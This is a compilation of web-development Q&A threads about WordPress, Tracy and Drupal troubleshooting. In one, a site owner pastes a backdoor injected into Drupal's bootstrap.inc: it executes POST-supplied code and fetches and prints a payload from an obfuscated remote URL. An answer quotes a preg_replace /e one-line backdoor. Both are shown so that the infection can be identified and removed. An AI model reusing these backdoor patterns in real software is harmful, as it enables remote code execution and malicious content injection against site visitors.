I just got a job of maintaining a wordpress/buddypress site.
I install the site locally with a virtual host, so that I didn't change any cfgs or code.
The site was running ok but today morning when I tries to load it I got white screen without any error in the log or anywhere.
I use a debugger to trace the problem and found the following supper-impressive code (wp-content/plugins/events-and-bookings/lib/class_wd_wpmu_oauth.php:378):
private function _refresh_token ($token) {
$this->set_parameter('refresh_token', $token, self::SCOPE_REFRESH);
$this->set_header('method', 'POST');
$raw_token = $this->_refresh_authentication_code();
if (!$raw_token) die;
$token_data = json_decode($raw_token, true);
if (!$token_data) die;
$token_data['time'] = time();
if (!isset($token_data['refresh_token'])) $token_data['refresh_token'] = $token;
$this->set_data('token_data', $token_data);
return $token_data;
}
I comment out the 2 lines that ends with die; - and WALLA! problem solved.
My questions are:
Why does the code die with out any warning - is it a security thing?
is there a better solution than commenting out these lines?
did the change I did can cause some unexpected problem that I'm unaware of?
what is that code actually doing or any info/reference to this problem.
thanks
Related
PageSpeed Insights is showing this error message for my wordpress website (MyBGMI.Com
I can't fix this problem. To be very honest can't understand the problem.
**Errors logged to the console indicate unresolved problems. They can come from network request failures and other browser concerns. Learn more
Source
Description
TypeError: Cannot read properties of null (reading 'parentNode') at data:text/javascript;base64,dmFyIGRvd25sb2FkQnV0dG9uPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJkb3dubG9hZCIpO3ZhciBjb3VudGVyPTQwO3ZhciBuZXdFbGVtZW50PWRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInAiKTtuZXdFbGVtZW50LmlubmVySFRNTD0iWW91IGNhbiBkb3dubG9hZCB0aGUgZmlsZSBpbiA0MCBzZWNvbmRzLiI7dmFyIGlkO2Rvd25sb2FkQnV0dG9uLnBhcmVudE5vZGUucmVwbGFjZUNoaWxkKG5ld0VsZW1lbnQsZG93bmxvYWRCdXR0b24pO2lkPXNldEludGVydmFsKGZ1bmN0aW9uKCl7Y291bnRlci0tO2lmKGNvdW50ZXI8MCl7bmV3RWxlbWVudC5wYXJlbnROb2RlLnJlcGxhY2VDaGlsZChkb3dubG9hZEJ1dHRvbixuZXdFbGVtZW50KTtjbGVhckludGVydmFsKGlkKX1lbHNle25ld0VsZW1lbnQuaW5uZXJIVE1MPSJKVVNUIFdBSVQgIitjb3VudGVyLnRvU3RyaW5nKCkrIiBTRUNPTkRTLiIrIllPVVIgQkdNSSAyLjMgRE9XTkxPQUQgTElOSyBJUyBHRU5FUkFUSU5HIn19LDEwMDAp:1:200**
I tired figured out the issue but did not understand anything. Just checked the page with chrome browser developers tool.
And where i found two erros. but can't understand how to fix them.
enter image description here
This is base64 encoded JavaScript (usually bad when found on WordPress site)
(you can decode it online here: https://www.base64decode.org/)
Decoded it says:
var downloadButton=document.getElementById("download");
var counter=40;
var newElement=document.createElement("p");
newElement.innerHTML="You can download the file in 40 seconds.";
var id;
downloadButton.parentNode.replaceChild(newElement,downloadButton);
id=setInterval(function(){
counter--;
if(counter<0){
newElement.parentNode.replaceChild(downloadButton,newElement);
clearInterval(id)
}else{
newElement.innerHTML="JUST WAIT "+counter.toString()+" SECONDS."+"YOUR BGMI 2.3 DOWNLOAD LINK IS GENERATING"
}
},1000)
it appears that newElement.parentNode is null and that's what's causing the error.
if this is your code, and a desired code-piece on your WordPress website - try changing if(counter<0){ into if (newElement.parentNode && counter<0) { . otherwise, find where this is coming from, and remove it from your code base.
Update
Try this:
var downloadButton=document.getElementById("download");
var counter=40;
var newElement=document.createElement("p");
newElement.innerHTML="You can download the file in 40 seconds.";
var id;
if (downloadButton && newElement.parentNode) {
downloadButton.parentNode.replaceChild(newElement,downloadButton);
id=setInterval(function(){
counter--;
if(counter<0){
newElement.parentNode.replaceChild(downloadButton,newElement);
clearInterval(id)
}else{
newElement.innerHTML="JUST WAIT "+counter.toString()+" SECONDS."+"YOUR BGMI 2.3 DOWNLOAD LINK IS GENERATING"
}
},1000)
}
I am a noob and since month I try to fix these bug but I understand nothing... Somebody can help me ?
https://imgshare.io/images/2020/03/11/Capturedd.png
medialibrary-uploader.php on line 125 : -
// If we've got a post, loop through and get it's ID.
if ( count( $_posts ) ) {
$_id = $_posts->ID;
} else {
What can I do to fix my theme ? Maybe it's because a plugnin made a problem ?
headers already sent this error generally comes when there is any error in your code at somewhere.
try to Enable error reporting to locate your errored code and fix it.
Comment out this line
// define('WP_DEBUG', false);
And add below code in your config.php file to enable more detailed error log.
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
define('WP_DEBUG_DISPLAY', false);
#ini_set('display_errors', 0);
Whenever I make an ajax request that throws an exception, the Tracy debugger is killing all output.
I've tested with Tracy turned off and exceptions get output. I've tested with just a page (ie: not ajax) and the exception gets output by Tracy properly.
I believe I've traced the problem to Bluescreen::render():
public function render($exception)
{
if (Helpers::isAjax() && session_status() === PHP_SESSION_ACTIVE) {
echo $exception->getMessage();
ob_start(function () {});
$this->renderTemplate($exception, __DIR__ . '/assets/BlueScreen/content.phtml');
$contentId = $_SERVER['HTTP_X_TRACY_AJAX'];
$_SESSION['_tracy']['bluescreen'][$contentId] = ['content' => ob_get_clean(), 'dumps' => Dumper::fetchLiveData(), 'time' => time()];
} else {
$this->renderTemplate($exception, __DIR__ . '/assets/BlueScreen/page.phtml');
}
}
I added the echo line at the top. It gets output.
The reason I'm asking on SO and not filing a bug report, is because just this morning it was working - the exception text was output, followed by a backtrace, followed by a message saying "unable to log error...". So I'm fairly certain the problem is mine, but I can't figure out where.
I have deleted my copy of Tracy and re-pulled from GitHub, so I'm using the latest & greatest version.
My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).
This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.
The drupal 7 is updated to 7.41, the modules are up to date.
The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (#$p[$_passssword] AND #$p['a'] AND #$p['c']) #$p[$_passssword](#$p['a'], #$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
I'm no back-end developer and I've been using bootstrap for hobby related-project for over 8 years.
I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.
Does anyone have any idea, how to block this changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where its coming from?
Thank you in advance.
I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.
Apart of the changes to the bootstrap.inc the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the Hacked module, which allows you to find modified files.
The backdoors in my Drupal looked similar to this code:
<?php #preg_replace('/(.*)/e', #$_POST['ttqdgkkfkolmt'], '');
This code uses a vulnerability in preg_replace, which allows the attackers to execute random PHP code using a simple HTTP post request. (The preg_replace vulnerably is resolved in PHP version > 5.5)
Hope this helped. Good luck finding the backdoors!
I'm trying to load the Google Maps API using the following syntax:
add_action('admin_enqueue_scripts', 'load_google_maps');
...
function load_google_maps()
{
// The actual API key is configured in an options page
$key = get_option('google_maps_api_key');
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
wp_enqueue_script('google-maps', $gmaps_url, NULL, NULL);
}
WordPress is escaping the "&" to "&". This actually makes the Google server reject the request. When I type it directly into browser address bar with "&sensor=false" at the end, it loads fine.
I saw a bug of this kind mentioned in the WordPress trac system: http://core.trac.wordpress.org/ticket/9243 but it was dismissed as invalid, and the admin responding to the request showed somehow that the "&" approach was fine. It is definitely not fine from Google's point of view.
I could of course just get the function to echo the HTML as a script tag, but I'd rather use the wp_enqueue_script system if possible.
Anyone know of a solution to this?
Cheers,
raff
I've got something similar in our code, and it's working fine (even encoded as &). I suspect your problem is that it's being double-encoded, as you already have &. Trying changing it to:
$gmaps_url = 'http://maps.googleapis.com/maps/api/js?key=' . $key . '&sensor=false';
For what it's worth, our (working) code is:
wp_register_script('googlemaps', 'http://maps.googleapis.com/maps/api/js?' . $locale . '&key=' . GOOGLE_MAPS_V3_API_KEY . '&sensor=false', false, '3');
wp_enqueue_script('googlemaps');
($locale in this case is set to hl=en)
Edit
Looks like the behaviour's changed in the latest version of WordPress - the above doesn't work (but I'll leave it for people on legacy versions). The only alternative I can see to echoing the script is to add a clean_url filter, something like this:
add_filter('clean_url', 'so_handle_038', 99, 3);
function so_handle_038($url, $original_url, $_context) {
if (strstr($url, "googleapis.com") !== false) {
$url = str_replace("&", "&", $url); // or $url = $original_url
}
return $url;
}
Pretty ugly, but perhaps marginally better than echoing the script, as it'll still use the WordPress dependency management.